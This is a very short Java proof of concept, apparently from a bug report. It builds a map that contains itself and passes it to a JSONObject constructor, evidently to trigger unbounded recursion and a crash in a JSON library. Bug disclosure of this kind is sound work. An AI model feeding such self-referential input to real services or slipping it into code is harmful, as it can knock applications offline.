poc as follw: >` Map<Object,Object> a=new HashMap<>(); a.put(" ",a); JSONObject A=new JSONObject(a); `